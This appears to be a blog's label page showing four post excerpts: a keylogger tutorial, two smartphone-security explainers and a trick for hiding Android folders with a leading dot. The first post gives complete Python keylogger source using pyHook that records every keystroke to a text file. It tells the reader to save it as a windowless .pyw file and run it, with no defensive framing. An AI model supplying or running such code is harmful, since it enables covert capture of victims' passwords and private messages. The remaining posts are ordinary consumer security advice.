Posts

Showing posts with the label android

Create a KeyLogger simply in a minute with Notepad

Image
Keylogger also called keystroke logging, are software programs or hardware devices that record keys struck on the computer keyboard of an individual computer user or network of computers.It almost records every keystroke that user typed and saved as a text file. Just open the notepad and copy paste the script. import pyHook, pythoncom, sys, logging # feel free to set the file_log to a different file name/location file_log = 'keyloggeroutput.txt' def OnKeyboardEvent(event): logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s') chr(event.Ascii) logging.log(10,chr(event.Ascii)) return True hooks_manager = pyHook.HookManager() hooks_manager.KeyDown = OnKeyboardEvent hooks_manager.HookKeyboard() pythoncom.PumpMessages() Now save it something filename.pyw and execute the keylogger file. When you need to quit logging, open up task manager and execute all the “python” forms. At that point search for keyloggeroutput.txt in a similar index were the som...

How to know your smart phone has been Hacked

Image
Smartphones are almost always connected to the internet, so it stands to reason that your phone hacked remotely. Hackers are always out there looking for entry points, and they seem to get more and more sophisticated as time moves along.Even if you keep your smartphone safe in your pocket or purse, it’s still at risk for picking up a virus or leaking data to thieves. Hackers don’t need physical access to your phone to steal your personal information or infect the device with malware. They can even use your data's for something special makes profit. The first indication that your phone hacked might have some form of malware or spyware installed would be random popups. Your phone runs out of battery faster than normal. If you don’t keep apps running in the background, there could be an unknown app running on your phone and draining energy. The next thing you should be on the lookout for is your data usage. Spyware apps by nature like to “phone home,” meaning that the data they steal ...

How to protect your smart phone from being Hacked

Image
Smartphones are almost always connected to the internet, so it stands to reason that your phone hacked remotely. Hackers are always out there looking for entry points, and they seem to get more and more sophisticated as time moves along.Even if you keep your smartphone safe in your pocket or purse, it’s still at risk for picking up a virus or leaking data to thieves. Hackers don’t need physical access to your phone to steal your personal information or infect the device with malware. For starters, never open a link from a strange text message. This also applies to links in which you cannot see the full URL. Keep your phone up to date – always install software updates as soon as they become available. First, make sure your phone is password-protected. A recent McAfee study found that more than a third of users don’t use a password on their phones. More and more often, employees are using their personal smartphones for work in which companies load their own apps onto the employees’ perso...

How to Hide Photos/Folders without any Application

Image
Hiding your personal picture files from your smartphone gallery is something critical. Frequently you end up installing a third party app to carry out the activity for you.You can hide your stuff like photos and folders without any application utilizing the trick beneath in few second. Any folders can be hidden from the smartphone gallery by following a basic trick. Step 1 Let’s say that you want to hide the folder which has the Screenshot images. To achieve the same, simply follow the steps below. Step 2 Launch the file explorer and navigate along the path to the folder that you don’t want to be shown in your gallery of Images. Since the folder that we want to hide is Screenshot, click on Pictures as shown in the below image. Under the Pictures folder, spot the sub folder named Screenshot, that you want to hide. Step 3 Long tap on the folder, to rename it. When the operations list pops up, choose Rename operation. STEP 4 You have to append a dot (.) at the beginning of the folder name...